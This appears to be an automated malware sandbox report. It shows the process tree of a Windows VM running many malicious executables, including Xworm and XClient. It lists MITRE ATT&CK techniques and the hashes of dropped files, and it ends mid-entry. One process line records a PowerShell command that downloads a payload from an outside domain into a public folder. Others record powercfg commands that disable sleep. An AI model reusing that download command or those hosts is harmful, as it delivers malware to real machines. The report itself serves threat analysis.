- - C:\Users\Admin\Desktop\a\TPB-1.exe
    "C:\Users\Admin\Desktop\a\TPB-1.exe"
    3⤵
    PID:972
- - C:\Users\Admin\Desktop\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\a\gvndxfghs.exe"
    3⤵
    PID:6272
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:7016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 80
        5⤵
        Program crash
        
        PID:3628
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:5516
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:3092
- - C:\Users\Admin\Desktop\a\random.exe
    "C:\Users\Admin\Desktop\a\random.exe"
    3⤵
    PID:6100
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1520
      4⤵
      Program crash
      PID:7916
- - C:\Users\Admin\Desktop\a\unik.exe
    "C:\Users\Admin\Desktop\a\unik.exe"
    3⤵
    PID:7028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1492
      4⤵
      Program crash
      PID:7576
- - C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe
    "C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe"
    3⤵
    PID:5188
- - C:\Users\Admin\Desktop\a\test28.exe
    "C:\Users\Admin\Desktop\a\test28.exe"
    3⤵
    PID:452
- - C:\Users\Admin\Desktop\a\test26.exe
    "C:\Users\Admin\Desktop\a\test26.exe"
    3⤵
    PID:5828
- - C:\Users\Admin\Desktop\a\test27.exe
    "C:\Users\Admin\Desktop\a\test27.exe"
    3⤵
    PID:7328
- - C:\Users\Admin\Desktop\a\test29.exe
    "C:\Users\Admin\Desktop\a\test29.exe"
    3⤵
    PID:2076
- - C:\Users\Admin\Desktop\a\test25.exe
    "C:\Users\Admin\Desktop\a\test25.exe"
    3⤵
    PID:3692
- - C:\Users\Admin\Desktop\a\test24.exe
    "C:\Users\Admin\Desktop\a\test24.exe"
    3⤵
    PID:7636
- - C:\Users\Admin\Desktop\a\fHR9z2C.exe
    "C:\Users\Admin\Desktop\a\fHR9z2C.exe"
    3⤵
    PID:7904
- - C:\Users\Admin\Desktop\a\AmLzNi.exe
    "C:\Users\Admin\Desktop\a\AmLzNi.exe"
    3⤵
    PID:1976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:6452
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9f515cc40,0x7ff9f515cc4c,0x7ff9f515cc58
    3⤵
    PID:1640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2380,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:2
    3⤵
    PID:5536
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1852,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2548 /prefetch:3
    3⤵
    PID:5864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1576,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2652 /prefetch:8
    3⤵
    PID:5780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
    3⤵
    PID:1476
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    PID:6504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4576,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
    3⤵
    PID:5396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4588,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:8
    3⤵
    PID:3224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4984,i,8922452870524636275,5877192097416620169,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:8
    3⤵
    PID:216
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  PID:1436
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe"
  2⤵
  PID:3864
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
  2⤵
  PID:5604
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
    3⤵
    PID:2152
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
  2⤵
  PID:5720
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
    3⤵
    PID:3624
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\Xworm%20V5.6.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Xworm%20V5.6.exe"
  2⤵
  PID:7080
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe"
  2⤵
  PID:4668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1384
    3⤵
    - Program crash
    PID:4996
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  PID:7024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1472
    3⤵
    - Program crash
    PID:3652
- C:\Users\Admin\Desktop\New Text Document mod (2).exe
  "C:\Users\Admin\Desktop\New Text Document mod (2).exe"
  2⤵
  PID:3648
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:6860

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4360

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2428 -ip 2428
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2640 -ip 2640
1⤵
PID:6168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5588 -ip 5588
1⤵
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4892 -ip 4892
1⤵
PID:5996

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1976

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6964 -ip 6964
1⤵
PID:5776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6724 -ip 6724
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5440 -ip 5440
1⤵
PID:1000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5440 -ip 5440
1⤵
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2820 -ip 2820
1⤵
PID:6016

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\689e061590f2412ca6806612876b3f21 /t 3996 /p 6652
1⤵
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6652 -ip 6652
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1720 -ip 1720
1⤵
PID:2240

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:7032

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:6272

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:6660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7016 -ip 7016
1⤵
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7024 -ip 7024
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4668 -ip 4668
1⤵
PID:3652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7028 -ip 7028
1⤵
PID:7716

C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe
C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe
1⤵
PID:1236
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1416
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:6348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:6312
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:6768
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:824
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6368 -ip 6368
1⤵
PID:7732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe

Filesize
11.3MB

MD5
89d9527f0a0dee03a03b82ee9e5970ac

SHA1
8954423f287c61b6762e3c7646c25035cd0ac3d2

SHA256
c51289c49ea88eae719f69ebe2d85f30993d8c7af297e1f47149e96b431a046e

SHA512
42f95eced4f002e2e5f10fd8507f706277a7d9f057bdcb6c867db18bbba0ca28f035a55373c5a483d22bbec6f3371b21566fc92f2d8419be0d3dbf9ff264161f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
1fd21a5228803360e7498b21377bd349

SHA1
c028d9a423b995bb2f9d9b56ef09e5a4f9535b38

SHA256
920270c469d0fdd572881597d30bae6f24faec32c8a1e7e689186947ac7958d3

SHA512
c2324e1b0a32c3d4abdac5ee1c2e663d1e49c24c17f0b5a5dac56cc867f67d2665f29148de2773f2e048292b189d136876b557ae9837517f612155633cbb09b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1493b2b7f0327491896cd7fbd6ac2603

SHA1
09af519fa687e62b5086b886ae43cc7a395a7848

SHA256
c0ddd5d6655954c91d58c8ca9985e442be13755a4c83e11ecb1f64b65a5a6b09

SHA512
adc190109879ffdfe7e77540d8e368198f0bd9fb816c8dc5266f0039256b0fd6e09e269728fb4a8ccc6b75863ccf4816b0acbb53b4d2d25ba98cdd9b3ed17393

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
41KB

MD5
e319c7af7370ac080fbc66374603ed3a

SHA1
4f0cd3c48c2e82a167384d967c210bdacc6904f9

SHA256
5ad4c276af3ac5349ee9280f8a8144a30d33217542e065864c8b424a08365132

SHA512
4681a68a428e15d09010e2b2edba61e22808da1b77856f3ff842ebd022a1b801dfbb7cbb2eb8c1b6c39ae397d20892a3b7af054650f2899d0d16fc12d3d1a011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
6293b5e6370071de8132730eb27ce89c

SHA1
8cde2e8c58db3bc734a8c9e265ce438bd8794d79

SHA256
2ce99dcc34b1fc5a50bcf7e209fac1a91c8981dc2616b4734c0b818758e15b4a

SHA512
f8a2a4c1e58dd20028ddcc4422359d2f308bedeb858a0b937ae47a34ea9565c44d72f331b85f530e6e2c44b7d820d2ff4b38653a718cdc4a3eb6711549ace220

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
6afada4330d3ac57c6cd3529e6be3e69

SHA1
57cb7197b8891bfc35df3ac93ccf10ade5e18d86

SHA256
87149bdd5682bbafe471b9595db2af49439b27638edb13f808a83f91602c1d7c

SHA512
8ffeb3448cd025bf9495cba92d4702514e977492eadf1b61f19800994ee76dda4cbd7bdbcac88d333dd33d15bb9bc94bd6040975465230c65890d10e746eb562

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
ba72f8a28de320a1c04d595aee01063d

SHA1
101497fcbc0ee3a9655ff6dc87095cac3dbbb147

SHA256
b316ee84fe7e8eeb06f774e5ab78ca045d363fd78ebf750f7f8b011560d37a65

SHA512
6333d627098374281ab2688d5988b61601b70d484a5de8c4efb8044c71187cf36aa1ce36370dcf6e7f13a6bb3c72b68a9fdf40cce159aac80aa4ff5c96278f82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
30a0ab041a089619d8074d5c7ae1b0f3

SHA1
38dfdbe090637beaeb028e998164b92b28776e01

SHA256
f1e64b50df9c6070fa8734de1d2d3dac6370b780ca37b25bccd8b38cfa4bb7c9

SHA512
8a2190afc217e9b5696eac10aedca3d8f204d7ed1fdaf2ed8240da5f6db53247f950b679480383b86b7d87dfceab66c34310ae4122b2bf9cb0d8086e7da76b50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
554861074a944da48024a34b9037f701

SHA1
48f85b6672e6346ab049441a65d59bec4ae20924

SHA256
cd0dfc5e6d2d12cfae85e4fe50f8cbab87e5ef44765a19d7d1fb1d3f99d5c53d

SHA512
edbfe48d6f9dcc45f63160b341d80da42e0e937ecff3bbb9f1fc35c942a826985efb4d94da306decf820b7ac63a454d900e05ab0b209920224b574a8961644e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
748c764187bbee92d5e3cf7bf384e886

SHA1
1e9c5fe7242d2e0f06e8886d8471d90a69abcee3

SHA256
b4f72eea9e29fc6547307444c5b446e6b2f5782d95f5deabd7674b06f5f360b3

SHA512
b8c4ccaa8deac07b9b24ccc0e03becca455c1953fd35ead82333aa37e7fe6d7b0722b435c5acfd893e0ca5d9dfdfc830730e532e7c946dc706ec69c3841129b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
606a96cd901b1813e99d7d067ba3ef40

SHA1
3cdbf8b815e5a00f5e1ead780113b209bdf0ff40

SHA256
9c520992cf229dc75f6e302b48a6fa9d646840624cb22f696544be3006a0877b

SHA512
b96d5cca2c3a182c0cf3132e5725dad28957798a413c205bb81218e21f6ce035619c0542a6185f14b12456e9608d426c77a295bac49faf62aeb8ffb20e327602

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
a02530260693ce0234ee26ba9a690ba1

SHA1
fee23d96879a7dea9c3c4f7ad7fa5b639757cf68

SHA256
00e140641c860f1fe1b438d57a7bf56b0cc263e4a594fda23f21b1046e4b9017

SHA512
52b78278a21bf50842773ac181e00626d962741e08f37c34b51a3ba424c222c4880927cc822a3f74ccf83dc012e6a5654d0578c7345759b37af809058e8a0688

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\fc011abe-029f-47fe-9ab5-b8a53217ff93.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
dea48c639ada41babbaeb7fb6ebf15a4

SHA1
45c3bd6140cd81ce0b16a27462e89326853f748b

SHA256
20a232af23030fc9c3b5a5137e623fddad760971e90033aa8176ee4b0767a9c5

SHA512
02220b662d4f31acff97a5000c0998625a34e459c2437bf9a7f0d705245f9a97d2c2e6276544e6e3b5db68719fb89e2939ed51718621b31d850a48f45291ece7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
7aba2094920cfbd8c856ad75aea3e41b

SHA1
72d2593f23dcf2997f0da89ac4ce48886abe0170

SHA256
9ac18c0d35cfe6a53bdad7e90ff0b317f2ac78985b1c2f5b661a57e3a20eecf7

SHA512
cd39e6127ff3aa3110f84d68dd0c79b59660477b731145245d72c0f6b0f4d94b9627667bb3dcc19e96768e80a152196d588fb205b866d86d2263e4b8f79a89e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
6668305d42e9c527b700762ed576acb6

SHA1
5ec4399372ab7c7054b0e2d736e87c40c305f405

SHA256
8475411b893f7263785e894c317e7fd3934f5372c6405ffaafbb9b47d1fb9379

SHA512
2170b1d4bdcf53467d8f1691c44ead8c38fd86026b8a45b463c513591bf8a434ad9c68adb5d12863b5cfa692f514e068b4e1aa7320398595032d21a810ef70bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
2KB

MD5
76496a917793a27aa8acf8cc554db3d7

SHA1
c9ffb216fa6a8f71ab65606084cbba66da0121f0

SHA256
6cfbf352a21ce9d3e82c4c861def6d5f2046454d7a9ff8028642a00e884893d2

SHA512
8a0d08999f994fdc5b3599727360039ce30edc8c7ab710debc6058a27655fd8c4a449bb7d0ca65a4b792d77a0e143d418290a30b49c8e1f55be6a784c0e00d14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
2KB

MD5
6f1bd3e33f441b5f4c4db418790dc644

SHA1
12640fca4c24354b4c85269ccfa7d914fe68ec46

SHA256
72658e579746c826ffdc72bb381b9b5bf8412f8c75a390fcebfe05abfb5a9b92

SHA512
f875e1d094af4642a38115d2676014a9b5afbb367fec7740e27936bd10d5b7e572752bde66f096a5e977ddf394b1aea0c7b6fa016a83e2d75f973b6149e205c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
150B

MD5
e1b28bcaa840015e72ff7fe2f9a83ddd

SHA1
d43039c778c2c1dbcb5e97751259f73a23043a18

SHA256
5e78ef758933c0ff3a4f3ce2bb5b48fe060219af9467f5e35b38b6f7fac0c3a3

SHA512
41fa8fc6abe14fd0ca7651087de3b69fd3fa0dbef43147168479c506c6cb41025ec032e8ccf3756eb30adedce541f6192ec35aeabbb3df6199b6e356d495191d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
284B

MD5
a98cc870aeda166689cc220fe5c9b8c7

SHA1
dc0f763eac59a34758834b7925af77d7e2187e5d

SHA256
30e0e072ae439b7b376dd64622da0de9d976bb89a15ae6acbfb2c6dade82da45

SHA512
1c4e183972eac33ef79cd277744cf1e15a8ceea0cf17fe33449d7752fda20db8333f5b3f76f3019524a7a3687c954da96faa8bc3f27e9cb6e72ad93b2b4c0bf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
418B

MD5
ef6bf75b391d283b7cc10977f60be93d

SHA1
aad0f8f41ea003a016401d465cb897c42bd8f7c7

SHA256
bd86628857f529aab81bfc656391818ef3400e7d774f5d727dc03d0c7ac9ae3b

SHA512
036e73c2db09d84c31534b25491f03951dc777b59ccf6289194c55803a8f3b772907730588a49b65790295edfb71789cedd74f04cef79f4b3e9e965cd8b1908f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
552B

MD5
da80bff78f7bb2212024e96abbc31ea5

SHA1
4b3fdc43c1fc28cf04206d5813acc4d672ae167c

SHA256
67d200a60f9aaf6847499f6b64d3f4fb0e3e5a51b4927638fd8722a339848db9

SHA512
808519466435f5b80490ae67b46acf2895e072fc4cc01f2b1f64b8bf9d1eb91fc4e8e183bba346cebf33f174c806a65ae1c17c6de8c80aa8c648f31fa4658877

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
686B

MD5
bf1c97a43aefc76abaabd7fc7f718ebc

SHA1
9ba4e99d61be1ff9c1a64f6b3b31976ab6117d0a

SHA256
698a0efea60ce3f5d3bde99718d2f916d9e86304c7168aa7b619bb7f79707ae8

SHA512
5275dc8a310890e51d257adc925f300000b4b5ad60b823ca335892807fa3f1eb37fd002fefc8de3318dc9d0f6ebc2e6a4b590125550ea2a50530af28de10376d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
820B

MD5
5f86ccacede60d2d391b71872bd78ed3

SHA1
68ef0773c0af35386e933d70ab862128d4e808c6

SHA256
c04bdac3f3b3210760a535ee80830e121de40c212e03b3042e86892af9ae7ac7

SHA512
03a0637764d373b334eac4c566ee21659ce063bd3242ecb3338c2b39b556153bfc0856baf5a120bc61257c80d8112e66a68d6b114bb990fc29908f3b43b36971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
954B

MD5
234780a4c152fcfd8c44f113e5220973

SHA1
0def791af66b70b9ccf5ed9d07ba3737612b1d13

SHA256
f9ce595b9a4686e302b83a493a0dc0785e0701bb5d2b4e95031c8be765180586

SHA512
01ecd2641468383c9cbcdd9be23e5671e45a65149d96bf3d30d604d3b314876a167422839d4c10105aec2ce478cb392956fee15546bf98e7e174735ad30c3b5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
